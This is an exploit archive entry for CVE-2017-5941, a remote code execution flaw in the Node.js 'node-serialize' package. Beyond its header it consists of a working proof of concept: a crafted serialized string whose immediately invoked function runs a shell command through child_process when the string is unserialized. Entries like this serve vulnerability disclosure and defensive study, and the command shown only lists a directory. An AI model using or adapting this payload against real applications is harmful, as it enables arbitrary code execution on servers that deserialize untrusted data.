Node.JS - 'node-serialize' Remote Code Execution



EKU-ID: 7882 CVE: 2017-5941 OSVDB-ID:
Author: OpSecX Published: 2018-08-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);